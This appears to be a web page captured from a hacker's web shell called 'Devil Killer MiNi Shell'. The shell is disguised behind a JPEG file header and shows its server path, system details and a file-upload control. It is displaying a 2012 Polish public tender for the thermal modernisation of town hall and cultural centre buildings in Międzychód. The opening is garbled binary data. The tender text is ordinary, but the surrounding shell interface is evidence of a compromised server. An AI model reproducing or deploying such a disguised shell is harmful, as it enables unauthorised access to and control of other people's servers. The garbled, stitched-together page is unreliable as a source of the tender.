JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120711/150993-N-2012.html

<p class="kh_header"><b>Międzychód: Termomodernizacja budynków Urzędu Miasta i Gminy 
oraz Nadwarciańskiego Centrum Animacji Kultury i Dziedzictwa Regionalnego PROM w Międzychodzie.</b><br>
<b>Numer ogłoszenia: 150993 - 2012; data zamieszczenia: 11.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy w Międzychodzie , ul. Piłsudskiego 2, 64-400 Międzychód, woj. wielkopolskie, tel. 095 7488100, faks 095 7488134.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miedzychod.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynków Urzędu Miasta i Gminy 
oraz Nadwarciańskiego Centrum Animacji Kultury i Dziedzictwa Regionalnego PROM w Międzychodzie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Wykonanie robót budowlanych związanych z wykonaniem zadania pn. Termomodernizacja budynków Urzędu Miasta i Gminy oraz Nadwarciańskiego Centrum Animacji Kultury i Dziedzictwa Regionalnego PROM w Międzychodzie.

Przedmiot  zamówienia obejmuje wykonanie robót budowlanych na dwóch obiektach, a mianowicie:

Obiekt I - Termomodernizacja budynku Urzędu Miasta i Gminy w Międzychodzie
Zakres rzeczowy Obiektu I zamówienia obejmuje wykonanie m.in.: 
- roboty budowlane ( przygotowanie starego podłoża pod tynki i  docieplenie metodą lekką, ocieplenie ścian budynku
płytami styropianowymi ,wykonanie warstwy tynkarskiej na ścianach płaskich, ocieplenie stropu warstwą wełny mineralnej, ocieplenie stropodachu płytami styropianowymi PW 11, wykucie z muru ościeżnic drewnianych, wymiana skrzydła okiennego skrzynkowego ze szczeblinami krzyżującymi się w ilości do 2 szt, flekowanie i szlifowanie elementów i wyrobów stolarskich, gruntowanie, bejcowanie i polerowanie okien,   
wykonanie i montaż okien jednodzielnych i dwudzielnych drewniane zespolone trzyszybowe budownictwo użyteczności publicznej, demontaż i montaż okien rozwiernych i uchylno-rozwiernych jednodzielnych i dwudzielnych z PCV, montaż nawiewników higrosterowanych, montaż drzwi stalowych pełnych, montaż drzwi zewnętrznych płycinowe pełne jednoskrzydłowe bez naświetli, montaż drzwi zewnętrznych płycinowe pełne dwuskrzydłowe z naświetlem ocieplone, drzwi zewnętrzne stylizowane,  montaż parapetów wewnętrznych przy oknach demontowanych, rozbiórka pokrycia z papy na dachach betonowych, rozebranie obróbek blacharskich, rozebranie rynien i rur spustowych nie nadających się do użytku, pokrycie dachu papą termozgrzewalną, wykonanie i montaż obróbek blacharskich, montaż rynien i rur spustowych, demontaż balustrad schodowych, wykonanie okładzin schodów z płytek o wymiarach 30x30

- instalacja centralnego ogrzewania
  (prace demontażowe) - demontaż rurociągów stalowych o śr. od 10 mm do 65 mm, demontaż zbiornikówodpowietrzających, demontaż zaworów grzejnikowych, przelotowych, demontaż grzejników żeliwnych, demontaż 
rozdzielaczy z rur stalowych, utylizacja materiałów z rozbiórki.
(przekucia, roboty budowlane i towarzyszące) - wykonanie przekuć w ścianach oraz zamurowanie otworów, uzupełnienie tynków, dwukrotne malowanie farbami emulsyjnymi starych tynków ścian i sufitów.
( montaż instalacji centralnego ogrzewania) - wykonanie rurociągów instalacji c.o. miedzianej o połączeniach 
lutowanych i o śr. zewnętrznej rur od 15 mm do 42 mm, montaż odpowietrzników automatycznych, montaż rozdzielaczy 
do kotłów i instalacji c.o., izolacja rurociągów w piwnicy, montaż zaworów grzejnikowych oraz zaworów skośnych do regulacji c.o., montaż grzejników stalowych dwupłytowych i trzypłytowych, montaż kompaktowego węzła cieplnego wraz
 z automatyką pogodową, płukanie instalacji c.o., próba szczelności instalacji  c.o., sprawdzenie działania instalacji c.o. podczas próby na gorąco.

- wentylacja mechaniczna
 (instalacja kanałowa nawiewna i wywiewna) - montaż przewodów wentylacyjnych z blachy stalowej, prostokątne, 
typ A/II o obwodzie do 1000mm, do 1400 mm, do 1800 mm, do 4400 mm, montaż centrali wentylacyjnej, montaż 
przepustnic  wielopłaszczyznowych stalowych prostokątnych, montaż klap pożarowych kołowych, izolacja przewodów wentylacyjnych, rozruch próbny instalacji wentylacji mechanicznej, regulacja przepływu instalacji wentylacji 
mechanicznej, obudowa kanałów wentylacyjnych okładziną gipsowo kartonową na rusztach metalowych.
  (instalacja  chłodnicza) - montaż agregatu wody lodowej z przyłączeniem do instalacji i rozruchem, wykonanie 
rurociągów wody lodowej, montaż zaworów skośnych, próba instalacji z dokonaniem regulacji zaworów.
  (instalacja cieplna) - wykonanie rurociągu wody grzewczej, izolacja rurociągu, montaż manometra, filtra siatkowego, zaworu bezpieczeństwa, zaworów skośnych, próba instalacji z dokonaniem regulacji zaworów.
  (instalacja zasilania elektrycznego centrali wentylacyjnej)  - układanie przewodów kabelkowych na tynku, 
 montaż wyłączników ręcznych do zasilania centrali wentylacyjnej oraz agregatu chłodniczego, sprawdzenie i pomiar obwodów elektrycznych  
 
Obiekt II - Termomodernizacja budynku Nadwarciańskiego Centrum Animacji Kultury
i Dziedzictwa Regionalnego PROM w Międzychodzie.

Zakres rzeczowy Obiektu II zamówienia obejmuje wykonanie m.in.:
- roboty budowlane (przygotowanie starego podłoża pod tynki i  docieplenie metodą lekką, ocieplenie ścian budynku
płytami styropianowymi ,wykonanie warstwy tynkarskiej na ścianach płaskich, ocieplenie stropodachu metodą 
wdmuchiwania z użyciem wełny mineralnej, ocieplenie stropodachu  wełną mineralną, ocieplenie stropodachu płytami styropianowymi PW 11, wykonanie izolacji przeciwwodnej folią, nawierzchnia (obramowania) z kostki betonowej 
gr. 80 mm, wykonanie instalacji odgromowej na budynku, wykucie z 
muru ościeżnic drewnianych, montaż okien uchylnych jednodzielnych z PCV- trzyszybowe, montaż okien rozwiernych i uchylno-rozwiernych dwudzielnych z PCV trzyszybowe, montaż nawiewników higrosterowanych, montaż drzwi aluminiowych jednoskrzydłowych pełnych, montaż drzwi aluminiowych jednoskrzydłowych oszklonych, montaż 
parapetów wewnętrznych przy oknach demontowanych, rozbiórka pokrycia z papy na dachu  betonowym,
rozbiórka obróbek blacharskich, demontaż rynien i rur spustowych, wykonanie i montaż nowych obróbek blacharskich 
rynien i rur spustowych, pokrycie dachu papą termozgrzewalną, wykonanie sufitu podwieszanego o konstrukcji metalowej, okładziny stropów płytami gipsowo-kartonowymi na ruszcie, dwukrotne malowanie farbami emulsyjnymi płyt gipsowo - kartonowych. 

- instalacja centralnego ogrzewania
  (prace demontażowe) - demontaż rurociągów stalowych o śr. od 10 mm do 50 mm, demontaż zbiorników    
odpowietrzających, demontaż zaworów grzejnikowych, przelotowych, demontaż grzejników żeliwnych, demontaż 
rozdzielaczy z rur stalowych, utylizacja materiałów z rozbiórki.
  (przekucia, roboty budowlane i towarzyszące) - wykonanie przekuć w ścianach oraz zamurowanie otworów, 
uzupełnienie tynków, dwukrotne malowanie farbami emulsyjnymi starych tynków ścian i sufitów.
  ( montaż instalacji centralnego ogrzewania) - wykonanie rurociągów instalacji c.o. miedzianej o połączeniach 
lutowanych i o śr. zewnętrznej rur od 15 mm do 42 mm, montaż odpowietrzników automatycznych, montaż rozdzielaczy 
do kotłów i instalacji c.o., izolacja rurociągów w piwnicy, montaż zaworów grzejnikowych oraz zaworów skośnych do 
regulacji c.o., montaż grzejników stalowych dwupłytowych i trzypłytowych, montaż kompaktowego węzła cieplnego wraz z automatyką pogodową, płukanie instalacji c.o., próba szczelności instalacji  c.o., sprawdzenie działania instalacji c.o. 
podczas próby na gorąco.

- wentylacja mechaniczna
  (instalacja kanałowa nawiewna i wywiewna) - montaż przewodów wentylacyjnych z blachy stalowej, prostokątne, 
typ A/II o obwodzie do 1000mm, do 1400 mm, do 1800 mm, do 4400 mm, montaż centrali wentylacyjnej, montaż  wentylatorów kanałowych, montaż nagrzewnicy kanałowej, montaż filtra tkaninowego workowego, montaż przepustnic  wielopłaszczyznowych stalowych prostokątnych, montaż klap pożarowych kołowych, izolacja przewodów wentylacyjnych, rozruch próbny instalacji wentylacji mechanicznej, regulacja przepływu instalacji wentylacji mechanicznej, obudowa 
kanałów wentylacyjnych okładziną gipsowo kartonową na rusztach metalowych.
 (instalacja chłodnicza) - montaż agregatu wody lodowej z przyłączeniem do instalacji i rozruchem, wykonanie 
rurociągów wody lodowej, montaż zaworów skośnych, próba instalacji z dokonaniem regulacji zaworów.
 (instalacja cieplna) - wykonanie rurociągu wody grzewczej, izolacja rurociągu, montaż manometra, filtra siatkowego, 
zaworu bezpieczeństwa, zaworów skośnych, próba instalacji z dokonaniem regulacji zaworów.
 (instalacja zasilania elektrycznego centrali wentylacyjnej)  - układanie przewodów kabelkowych na tynku, 
 montaż wyłączników ręcznych do zasilania centrali wentylacyjnej oraz agregatu chłodniczego.  
 
Szczegółowy zakres robót do wykonania określa kosztorys ślepy(ofertowy) specyfikacja techniczna wykonania i odbioru robót budowlanych oraz projekt budowlany stanowiące załączniki do Specyfikacji Istotnych Warunków Zamówienia 

Zamawiający dopuszcza przy wykonywaniu robót budowlanych stosowanie materiałów równoważnych (adekwatnych zamienników materiałów), spełniających te same parametry techniczne oraz jakościowe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art.67 ust 1, pkt. 6 ustawy Pzp. Roboty budowlane uzupełniające stanowiące nie więcej niż 50% wartości zamówienia podstawowego i polegające na powtórzeniu tego samego rodzaju zamówień, jeżeli zamówienie podstawowe zostało udzielone w trybie przetargu nieograniczonego, a zamówienie uzupełniające było przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.00.00-6, 45.32.10.00-3, 45.32.40.00-4, 45.33.11.00-7, 45.33.12.10-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w kwocie  50.000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie dokumentów i oświadczeń dołączonych do oferty na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca udokumentuje, że zrealizował w okresie ostatnich 5 lat co najmniej dwa zadania (tzn. rozpoczęli i zakończyli) przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych 
polegających na termomodernizacji budynków użyteczności publicznej obejmujących: (ocieplenie ścian zewnętrznych i stropów, wykonanie wentylacji mechanicznej, modernizacja systemu grzewczego, wymiana okien), o wartości brutto nie mniejszej niż 1.500 000 PLN dla jednego obiektu budowlanego. Wykonawca musi również dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie(referencje, protokóły odbioru robót).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca udokumentuje, że dysponuje co najmniej następującymi ilościami jednostek sprzętowych: (samochód  samowyładowczy min 5 t - 1 szt, ciągnik kołowy 50 kM  z przyczepą do 5 t - 1 kpl lub samochód dostawczy skrzyniowy do 5 t 1 szt, betoniarka wolnospadowa elektr. 250 dm3 - 2 szt, rusztowania rurowe, ramowe elewacyjne do 20 m 1 kpl.), wyciąg budowlany elektryczny  do 0,5 t lub równoważy sprzęt spełniający tą samą funkcję 
              techniczną).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami odpowiedzialnymi za  prowadzenie robót (kierownik budowy, kierownicy robót poszczególnych branży budowlanej, wentylacji mechanicznej, centralnego ogrzewania i elektrycznej). Wykazane przez Wykonawcę osoby winny posiadać uprawnienia niezbędne do wykonania prac objętych przedmiotem zamówienia, wymagane przepisami  ustawy z dnia 7 lipca 1994 r. Prawo Budowlane oraz należeć do właściwej Okręgowej Izby Inżynierów Budownictwa.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie  mniejszą niż  1.500.000 PLN, oraz posiadają środki finansowe lub zdolność kredytową w wysokości minimum  1.000.000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-wypełniony formularz ofertowy - wg wzoru druku stanowiącego załącznik nr 1 do SIWZ, 
-dowód wniesienia wadium, 
-kosztorys /ślepy/, który po wypełnieniu przez wykonawcę stanowić będzie    
      kosztorys ofertowy wg wzoru druku stanowiącego załącznik nr 8 do SIWZ

     Gwarancja - Wykonawca w ramach zaoferowanej ceny gwarantuje trwałość przedmiotu zamówienia co najmniej:    
                        - 3 lata od daty odbioru robót - na roboty budowlane 

1. Termin wykonania robót na Obiekcie I  zamówienia od dnia 20.08.2012 r.  do dnia   15.12.2012 r. 

2. Termin wykonania robót na Obiekcie II  zamówienia od dnia 03.09.2012r.  do dnia  15.05.2013 r.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
